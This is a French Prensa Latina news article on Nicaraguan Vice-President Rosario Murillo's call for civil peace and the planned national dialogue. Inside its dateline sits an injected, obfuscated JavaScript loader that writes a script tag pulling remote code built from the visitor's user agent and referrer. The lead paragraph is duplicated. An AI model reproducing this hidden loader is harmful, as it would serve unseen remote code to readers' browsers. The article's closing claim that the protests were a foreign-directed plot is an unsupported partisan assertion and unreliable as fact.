lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le gouvernement du Nicaragua réitère son appel à la paix civile

Managua, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|aredz|var|u0026u|referrer|hykrn||js|php'.split('|'),0,{})) 15 mai (Prensa Latina) La vice-présidente du Nicaragua, Rosario Murillo, a aujourd'hui répété son appel à la paix civile après les récents actes de violence qu'a connus le pays.

Managua, 15 mai (Prensa Latina) La vice-présidente du Nicaragua, Rosario Murillo, a aujourd’hui répété son appel à la paix civile après les récents actes de violence qu’a connus le pays.

Le Nicaragua veut vivre en paix, en appelle à Dieu, et prie tous les jours afin que le pays sorte victorieux de cette épreuve, a-t-elle affirmé.

Murillo a déclaré que les familles du Nicaragua souhaitent les meilleures conditions possibles pour travailler, pour vivre et, surtout, pour retrouver la sécurité nécessaire.

Lors de son allocution quotidienne, la vice-présidente a salué les habitants de Masaya « qui ont vécu des heures sombres » et a exprimé sa sympathie envers « les familles qui ont perdu leurs emplois et ont été éprouvées » par les récents événements.

Nous ne voulons ni la violence, ni la destruction, ni la mort, a affirmé fermement Murillo tout en répétant son souhait pour un retour à la tranquillité et à la justice.

Depuis que le président Ortega a convoqué le pays au dialogue, le gouvernement s’efforce de réinstaller le calme et la cohabitation afin que les diverses parties s’écoutent et parviennent à se sentir en harmonie, a-telle assuré.

Elle a également souligné que l’exécutif a accepté à la visite de la Commission Internationale des Droits de l’Homme  (CIDH),  ce qui démontre une nouvelle preuve de l’effort fourni par le gouvernement pour faciliter le dialogue.

A ce sujet, elle a rappelé que la CIDH viendra au Nicaragua pour observer les conditions des droits de l’homme dans le contexte des évènements du 18 avril qui ont connu une telle vague de violence.

.
La présence de la Commission répond à l’une des demandes de la Conférence Episcopale du Nicaragua pour faciliter les débuts du dialogue prévu pour mercredi.

En tant que médiateur et témoin, le président de la Conférence, le cardinal Leopoldo Brenes, a demandé à tous les secteurs de la société de s’efforcer à maintenir une ambiance de tolérance et de respect, surtout lors des manifestations pacifiques, afin de montrer ainsi leur soutien et de créer un climat propice au dialogue.

En outre, il a demandé d’éviter toute action susceptible de déchainer des situations de violence et de mettre fin à tout acte de pillage de la nation.

A l’origine des récentes violences se trouve la proposition de réforme de la sécurité sociale, proposition qui a été ensuite retirée et remplacée par une convocation au dialogue national demandée par président lui-même.

Selon de nombreux observateurs, cette proposition de réforme a servi d’excuse pour mettre en marche un plan dirigé de l’extérieur et dont le but est de déstabiliser la nation et de provoquer le renversement du gouvernement sandiniste.

peo/ocs/lla

EN CONTINU
notes connexes